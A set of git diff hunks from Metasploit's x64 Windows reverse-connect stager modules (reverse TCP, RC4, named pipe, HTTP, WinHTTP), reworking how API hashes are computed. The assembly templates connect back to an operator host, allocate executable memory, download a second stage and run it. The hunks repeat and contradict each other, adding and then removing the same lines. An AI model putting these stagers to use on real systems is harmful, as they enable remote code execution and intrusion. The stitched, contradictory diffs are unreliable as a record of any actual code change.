@@ -86,7 +86,6 @@ module Payload::Windows::ReverseHttp_x64
   # Generate and compile the stager
   #
   def generate_reverse_http(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                 ; Clear the direction flag.
       and rsp, ~0xf       ; Ensure RSP is 16 byte aligned

--- a/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb
@@ -54,6 +54,7 @@ module Payload::Windows::ReverseNamedPipe_x64
   # Generate and compile the stager
   #
   def generate_reverse_named_pipe(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                     ; Clear the direction flag.
       and rsp, ~0xF           ;  Ensure RSP is 16 byte aligned
@@ -125,7 +126,7 @@ module Payload::Windows::ReverseNamedPipe_x64
         xor r9, r9              ; lpSecurityAttributes
         xor r8, r8              ; dwShareMode
         mov rdx, 0xC0000000     ; dwDesiredAccess(GENERIC_READ|GENERIC_WRITE)
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'CreateFileA')}
         call rbp                ; CreateFileA(...)
 
       ; check for failure
@@ -145,7 +146,7 @@ module Payload::Windows::ReverseNamedPipe_x64
     else
       asm << %Q^
       failure:
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call rbp
       ^
     end
@@ -170,7 +171,7 @@ module Payload::Windows::ReverseNamedPipe_x64
         push 0                  ; lpOverlapped
         mov rdx, rsi            ; lpBuffer
         mov rcx, rdi            ; hFile
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')}
         call rbp                ; ReadFile(...)
     ^
 
@@ -199,7 +200,7 @@ module Payload::Windows::ReverseNamedPipe_x64
         pop r8                  ; MEM_COMMIT
         mov rdx, rsi            ; the newly received second stage length.
         xor rcx, rcx            ; NULL as we dont care where the allocation is.
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call rbp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
         ; Receive the second stage and execute it...
         mov rbx, rax            ; rbx = our new memory address for the new stage
@@ -219,7 +220,7 @@ module Payload::Windows::ReverseNamedPipe_x64
         mov rdx, rbx            ; lpBuffer
         push 0                  ; lpOverlapped
         mov rcx, rdi            ; hFile
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')}
         call rbp                ; ReadFile(...)
         add rsp, 0x28           ; slight stack adjustment
     ^
@@ -239,14 +240,14 @@ module Payload::Windows::ReverseNamedPipe_x64
         pop r8                  ; dwFreeType
         push 0                  ; 0
         pop rdx                 ; dwSize
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'VirtualFree')}
         call rbp                ; VirtualFree(payload, 0, MEM_DECOMMIT)
 
       cleanup_file:
       ; clean up the socket
         push rdi                ; file handle
         pop rcx                 ; hFile
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'CloseHandle')}
         call rbp
 
       ; and try again

--- a/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb
@@ -54,7 +54,6 @@ module Payload::Windows::ReverseNamedPipe_x64
   # Generate and compile the stager
   #
   def generate_reverse_named_pipe(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                     ; Clear the direction flag.
       and rsp, ~0xF           ;  Ensure RSP is 16 byte aligned

--- a/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb
@@ -48,7 +48,6 @@ module Payload::Windows::ReverseTcpRc4_x64
   # Generate and compile the stager
   #
   def generate_reverse_tcp_rc4(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                     ; Clear the direction flag.
       and rsp, ~0xF           ;  Ensure RSP is 16 byte aligned

--- a/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb
@@ -48,6 +48,7 @@ module Payload::Windows::ReverseTcpRc4_x64
   # Generate and compile the stager
   #
   def generate_reverse_tcp_rc4(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                     ; Clear the direction flag.
       and rsp, ~0xF           ;  Ensure RSP is 16 byte aligned
@@ -74,7 +75,7 @@ module Payload::Windows::ReverseTcpRc4_x64
         push 4                  ;
         pop r8                  ; length = sizeof( DWORD );
         mov rcx, rdi            ; the saved socket
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
         call rbp                ; recv( s, &dwLength, 4, 0 );
     ^
 
@@ -101,7 +102,7 @@ module Payload::Windows::ReverseTcpRc4_x64
         pop r8                  ; MEM_COMMIT
         mov rdx, rsi            ; the newly received second stage length.
         xor rcx,rcx             ; NULL as we dont care where the allocation is.
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call rbp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
         ; Receive the second stage and execute it...
         ; mov rbx, rax            ; rbx = our new memory address for the new stage
@@ -117,7 +118,7 @@ module Payload::Windows::ReverseTcpRc4_x64
         mov r8, rsi             ; length
         mov rdx, rbx            ; the current address into our second stages RWX buffer
         mov rcx, rdi            ; the saved socket
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
         call rbp                ; recv( s, buffer, length, 0 );
         add rsp, 32             ; restore stack after api_call
     ^
@@ -137,14 +138,14 @@ module Payload::Windows::ReverseTcpRc4_x64
         pop r8                  ; dwFreeType
         push 0                  ; 0
         pop rdx                 ; dwSize
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'VirtualFree')}
         call rbp                ; VirtualFree(payload, 0, MEM_COMMIT)
 
       cleanup_socket:
       ; clean up the socket
         push rdi                ; socket handle
         pop rcx                 ; s (closesocket parameter)
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'closesocket')}
         call rbp
 
       ; and try again

--- a/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb
@@ -55,6 +55,8 @@ module Payload::Windows::ReverseTcp_x64
   # Generate and compile the stager
   #
   def generate_reverse_tcp(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
+    opts[:block_api_iv] = block_api_iv
     combined_asm = %Q^
       cld                     ; Clear the direction flag.
       and rsp, ~0xF           ;  Ensure RSP is 16 byte aligned
@@ -120,14 +122,14 @@ module Payload::Windows::ReverseTcp_x64
 
       ; perform the call to LoadLibraryA...
         mov rcx, r14            ; set the param for the library to load
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
         call rbp                ; LoadLibraryA( "ws2_32" )
 
       ; perform the call to WSAStartup...
         mov rdx, r13            ; second param is a pointer to this struct
         push 0x0101             ;
         pop rcx                 ; set the param for the version requested
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')}
         call rbp                ; WSAStartup( 0x0101, &WSAData );
 
       ; stick the retry count on the stack and store it
@@ -144,7 +146,7 @@ module Payload::Windows::ReverseTcp_x64
         mov rdx, rax            ; push SOCK_STREAM
         inc rax                 ;
         mov rcx, rax            ; push AF_INET
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')}
         call rbp                ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
         mov rdi, rax            ; save the socket for later
 
@@ -154,7 +156,7 @@ module Payload::Windows::ReverseTcp_x64
         pop r8                  ; pop off the third param
         mov rdx, r12            ; set second param to pointer to sockaddr struct
         mov rcx, rdi            ; the socket
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'connect')}
         call rbp                ; connect( s, &sockaddr, 16 );
 
         test eax, eax           ; non-zero means failure
@@ -173,7 +175,7 @@ module Payload::Windows::ReverseTcp_x64
     else
       asm << %Q^
       failure:
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call rbp
       ^
     end
@@ -203,7 +205,7 @@ module Payload::Windows::ReverseTcp_x64
         push 4                  ;
         pop r8                  ; length = sizeof( DWORD );
         mov rcx, rdi            ; the saved socket
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
         call rbp                ; recv( s, &dwLength, 4, 0 );
     ^
 
@@ -228,7 +230,7 @@ module Payload::Windows::ReverseTcp_x64
         pop r8                  ; MEM_COMMIT
         mov rdx, rsi            ; the newly received second stage length.
         xor rcx, rcx            ; NULL as we dont care where the allocation is.
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call rbp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
         ; Receive the second stage and execute it...
         mov rbx, rax            ; rbx = our new memory address for the new stage
@@ -239,7 +241,7 @@ module Payload::Windows::ReverseTcp_x64
         mov r8, rsi             ; length
         mov rdx, rbx            ; the current address into our second stages RWX buffer
         mov rcx, rdi            ; the saved socket
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
         call rbp                ; recv( s, buffer, length, 0 );
     ^
 
@@ -258,14 +260,14 @@ module Payload::Windows::ReverseTcp_x64
         pop r8                  ; dwFreeType
         push 0                  ; 0
         pop rdx                 ; dwSize
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'VirtualFree')}
         call rbp                ; VirtualFree(payload, 0, MEM_COMMIT)
 
       cleanup_socket:
       ; clean up the socket
         push rdi                ; socket handle
         pop rcx                 ; s (closesocket parameter)
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'closesocket')}
         call rbp
 
       ; and try again

--- a/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb
@@ -55,8 +55,6 @@ module Payload::Windows::ReverseTcp_x64
   # Generate and compile the stager
   #
   def generate_reverse_tcp(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
-    opts[:block_api_iv] = block_api_iv
     combined_asm = %Q^
       cld                     ; Clear the direction flag.
       and rsp, ~0xF           ;  Ensure RSP is 16 byte aligned

--- a/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb
@@ -206,7 +206,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov r14, 'winhttp'
         push r14                      ; Push 'winhttp',0 onto the stack
         mov rcx, rsp                  ; lpFileName (stackpointer)
-        mov r10, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA
+        mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA
         call rbp
     ^
 
@@ -217,7 +217,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov r14, 'crypt32'
         push r14                      ; Push 'crypt32',0 onto the stack
         mov rcx, rsp                  ; lpFileName (stackpointer)
-        mov r10, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA
+        mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA
         call rbp
       ^
     end
@@ -250,7 +250,7 @@ module Payload::Windows::ReverseWinHttp_x64
         xor r9, r9                    ; pwszProxyBypass (NULL)
         push rbx                      ; stack alignment
         push rbx                      ; dwFlags (0)
-        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpOpen')}; WinHttpOpen
+        mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpOpen')}; WinHttpOpen
         call rbp
     ^
 
@@ -268,7 +268,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov rcx, rax                  ; hSession
         mov r8, #{opts[:port]}        ; nServerPort
         xor r9, r9                    ; dwReserved
-        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpConnect')} ; WinHttpConnect
+        mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpConnect')} ; WinHttpConnect
         call rbp
 
         call winhttpopenrequest
@@ -306,7 +306,7 @@ module Payload::Windows::ReverseWinHttp_x64
         push rax
         push rbx                      ; lppwszAcceptType (NULL)
         push rbx                      ; pwszReferer (NULL)
-        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpOpenRequest')} ; WinHttpOpenRequest
+        mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpOpenRequest')} ; WinHttpOpenRequest
         call rbp
 
       prepare:
@@ -323,7 +323,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov rdx, 0x1002               ; (0x1002=WINHTTP_OPTION_PROXY_USERNAME)
         push #{proxy_user.length}     ; dwBufferLength (proxy_user length)
         pop r9
-        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
+        mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
         call rbp
       ^
     end
@@ -338,7 +338,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov rdx, 0x1003               ; (0x1003=WINHTTP_OPTION_PROXY_PASSWORD)
         push #{proxy_pass.length}     ; dwBufferLength (proxy_pass length)
         pop r9
-        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
+        mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
         call rbp
       ^
     end
@@ -350,7 +350,7 @@ module Payload::Windows::ReverseWinHttp_x64
         sub rax, 32
         mov rdi, rsp                  ; save a pointer to this buffer
         mov rcx, rdi                  ; this buffer is also the parameter to the function
-        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')} ; WinHttpGetIEProxyConfigForCurrentUser
+        mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')} ; WinHttpGetIEProxyConfigForCurrentUser
         call rbp
 
         test eax, eax                 ; skip the rest of the proxy stuff if the call failed
@@ -386,7 +386,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov rdx, r13                  ; lpcwszUrl
 
         ; finally make the call
-        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')} ; WinHttpGetProxyForUrl
+        mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')} ; WinHttpGetProxyForUrl
         call rbp
 
         test eax, eax                 ; skip the rest of the proxy stuff if the call failed
@@ -413,7 +413,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov rcx, rsi                  ; hConnection (connection handle)
         push 38
         pop rdx                       ; (38=WINHTTP_OPTION_PROXY)
-        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
+        mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
         call rbp
 
       ie_proxy_setup_finish:
@@ -440,7 +440,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov r8, rsp                   ; lpBuffer (pointer to flags)
         push 4
         pop r9                        ; dwBufferLength (4 = size of flags)
-        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
+        mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
         call rbp
 
         xor r8, r8                    ; dwHeadersLen (0)
@@ -470,7 +470,7 @@ module Payload::Windows::ReverseWinHttp_x64
         push rbx                      ; dwContext (0)
         push rbx                      ; dwTotalLength (0)
         push rbx                      ; dwOptionalLength (0)
-        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpSendRequest')} ; WinHttpSendRequest
+        mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpSendRequest')} ; WinHttpSendRequest
         call rbp
         test eax, eax
         jnz handle_response
@@ -498,7 +498,7 @@ module Payload::Windows::ReverseWinHttp_x64
       asm << %Q^
       failure:
         ; hard-coded to ExitProcess(whatever) for size
-        mov r10, #{block_api_hash('kernel32.dll', 'ExitProcess')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call rbp                      ; ExitProcess(whatever)
       ^
     end
@@ -508,7 +508,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov rcx, rsi                  ; hRequest
         push rbx
         pop rdx                       ; lpReserved (NULL)
-        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} ; WinHttpReceiveResponse
+        mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} ; WinHttpReceiveResponse
         call rbp
         test eax, eax                 ; make sure the request succeeds
         jz failure
@@ -528,7 +528,7 @@ module Payload::Windows::ReverseWinHttp_x64
         push rbx                      ; 0 for alignment
         push 8                        ; One whole pointer
         mov r9, rsp                   ; Stack pointer (lpdwBufferLength)
-        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpQueryOption')}
+        mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpQueryOption')}
         call rbp
         test eax, eax                 ; use eax instead of rax, saves a byte
         jz failure                    ; Bail out if we couldn't get the certificate context
@@ -543,7 +543,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov r14, r8                   ; Back the stack pointer up for later use
         push 3
         pop rdx                       ; CERT_SHA1_HASH_PROP_ID (dwPropId)
-        mov r10, #{block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')}
+        mov r10d, #{block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')}
         call rbp
         test eax, eax                 ; use eax instead of rax, saves a byte
         jz failure                    ; Bail out if we couldn't get the certificate context
@@ -575,7 +575,7 @@ module Payload::Windows::ReverseWinHttp_x64
         push 4
         pop r8                        ; dwNumberOfBytesToRead (4 bytes)
         mov rcx, rsi                  ; hFile (request handle)
-        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData
+        mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData
         call rbp
         test eax, eax                 ; did the download fail?
         jz failure
@@ -590,7 +590,7 @@ module Payload::Windows::ReverseWinHttp_x64
         push 0x40
         pop r9                        ; flProtect (0x40=PAGE_EXECUTE_READWRITE)
         mov r8, 0x1000                ; flAllocationType (0x1000=MEM_COMMIT)
-        mov r10, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call rbp
 
         ;download stage
@@ -603,7 +603,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov r8, rax                   ; dwNumberOfBytesToRead (incoming stage size)
         mov rdx, rbx                  ; lpBuffer (pointer to mem)
         mov r9, rdi                   ; lpdwNumberOfByteRead (stack pointer)
-        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData
+        mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData
         call rbp
         add rsp, 32                   ; clean up reserved space
         test eax, eax                 ; did the download fail?
@@ -620,7 +620,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov r9, rdx                   ; flProtect (0x40=PAGE_EXECUTE_READWRITE)
         shl edx, 16                   ; dwSize
         mov r8, 0x1000                ; flAllocationType (0x1000=MEM_COMMIT)
-        mov r10, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} ; VirtualAlloc
+        mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} ; VirtualAlloc
         call rbp
 
       download_prep:
@@ -634,7 +634,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov rdx, rbx                  ; lpBuffer (pointer to mem)
         mov r8, 8192                  ; dwNumberOfBytesToRead (8k)
         mov r9, rdi                   ; lpdwNumberOfByteRead (stack pointer)
-        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData
+        mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData
         call rbp
         add rsp, 32                   ; clean up reserved space
 

--- a/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb
@@ -63,7 +63,6 @@ module Payload::Windows::ReverseWinHttp_x64
   # Generate and compile the stager
   #
   def generate_reverse_winhttp(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                 ; Clear the direction flag.
       and rsp, ~0xf       ; Ensure RSP is 16 byte aligned

--- a/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb
@@ -63,6 +63,7 @@ module Payload::Windows::ReverseWinHttp_x64
   # Generate and compile the stager
   #
   def generate_reverse_winhttp(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                 ; Clear the direction flag.
       and rsp, ~0xf       ; Ensure RSP is 16 byte aligned
@@ -205,7 +206,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov r14, 'winhttp'
         push r14                      ; Push 'winhttp',0 onto the stack
         mov rcx, rsp                  ; lpFileName (stackpointer)
-        mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA
+        mov r10, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA
         call rbp
     ^
 
@@ -216,7 +217,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov r14, 'crypt32'
         push r14                      ; Push 'crypt32',0 onto the stack
         mov rcx, rsp                  ; lpFileName (stackpointer)
-        mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA
+        mov r10, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA
         call rbp
       ^
     end
@@ -249,7 +250,7 @@ module Payload::Windows::ReverseWinHttp_x64
         xor r9, r9                    ; pwszProxyBypass (NULL)
         push rbx                      ; stack alignment
         push rbx                      ; dwFlags (0)
-        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')}; WinHttpOpen
+        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpOpen')}; WinHttpOpen
         call rbp
     ^
 
@@ -267,7 +268,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov rcx, rax                  ; hSession
         mov r8, #{opts[:port]}        ; nServerPort
         xor r9, r9                    ; dwReserved
-        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpConnect')} ; WinHttpConnect
+        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpConnect')} ; WinHttpConnect
         call rbp
 
         call winhttpopenrequest
@@ -305,7 +306,7 @@ module Payload::Windows::ReverseWinHttp_x64
         push rax
         push rbx                      ; lppwszAcceptType (NULL)
         push rbx                      ; pwszReferer (NULL)
-        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpenRequest')} ; WinHttpOpenRequest
+        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpOpenRequest')} ; WinHttpOpenRequest
         call rbp
 
       prepare:
@@ -322,7 +323,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov rdx, 0x1002               ; (0x1002=WINHTTP_OPTION_PROXY_USERNAME)
         push #{proxy_user.length}     ; dwBufferLength (proxy_user length)
         pop r9
-        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
+        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
         call rbp
       ^
     end
@@ -337,7 +338,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov rdx, 0x1003               ; (0x1003=WINHTTP_OPTION_PROXY_PASSWORD)
         push #{proxy_pass.length}     ; dwBufferLength (proxy_pass length)
         pop r9
-        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
+        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
         call rbp
       ^
     end
@@ -349,7 +350,7 @@ module Payload::Windows::ReverseWinHttp_x64
         sub rax, 32
         mov rdi, rsp                  ; save a pointer to this buffer
         mov rcx, rdi                  ; this buffer is also the parameter to the function
-        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')} ; WinHttpGetIEProxyConfigForCurrentUser
+        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')} ; WinHttpGetIEProxyConfigForCurrentUser
         call rbp
 
         test eax, eax                 ; skip the rest of the proxy stuff if the call failed
@@ -385,7 +386,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov rdx, r13                  ; lpcwszUrl
 
         ; finally make the call
-        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')} ; WinHttpGetProxyForUrl
+        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')} ; WinHttpGetProxyForUrl
         call rbp
 
         test eax, eax                 ; skip the rest of the proxy stuff if the call failed
@@ -412,7 +413,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov rcx, rsi                  ; hConnection (connection handle)
         push 38
         pop rdx                       ; (38=WINHTTP_OPTION_PROXY)
-        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
+        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
         call rbp
 
       ie_proxy_setup_finish:
@@ -439,7 +440,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov r8, rsp                   ; lpBuffer (pointer to flags)
         push 4
         pop r9                        ; dwBufferLength (4 = size of flags)
-        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
+        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
         call rbp
 
         xor r8, r8                    ; dwHeadersLen (0)
@@ -469,7 +470,7 @@ module Payload::Windows::ReverseWinHttp_x64
         push rbx                      ; dwContext (0)
         push rbx                      ; dwTotalLength (0)
         push rbx                      ; dwOptionalLength (0)
-        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')} ; WinHttpSendRequest
+        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpSendRequest')} ; WinHttpSendRequest
         call rbp
         test eax, eax
         jnz handle_response
@@ -497,7 +498,7 @@ module Payload::Windows::ReverseWinHttp_x64
       asm << %Q^
       failure:
         ; hard-coded to ExitProcess(whatever) for size
-        mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+        mov r10, #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call rbp                      ; ExitProcess(whatever)
       ^
     end
@@ -507,7 +508,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov rcx, rsi                  ; hRequest
         push rbx
         pop rdx                       ; lpReserved (NULL)
-        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} ; WinHttpReceiveResponse
+        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} ; WinHttpReceiveResponse
         call rbp
         test eax, eax                 ; make sure the request succeeds
         jz failure
@@ -527,7 +528,7 @@ module Payload::Windows::ReverseWinHttp_x64
         push rbx                      ; 0 for alignment
         push 8                        ; One whole pointer
         mov r9, rsp                   ; Stack pointer (lpdwBufferLength)
-        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpQueryOption')}
+        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpQueryOption')}
         call rbp
         test eax, eax                 ; use eax instead of rax, saves a byte
         jz failure                    ; Bail out if we couldn't get the certificate context
@@ -542,7 +543,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov r14, r8                   ; Back the stack pointer up for later use
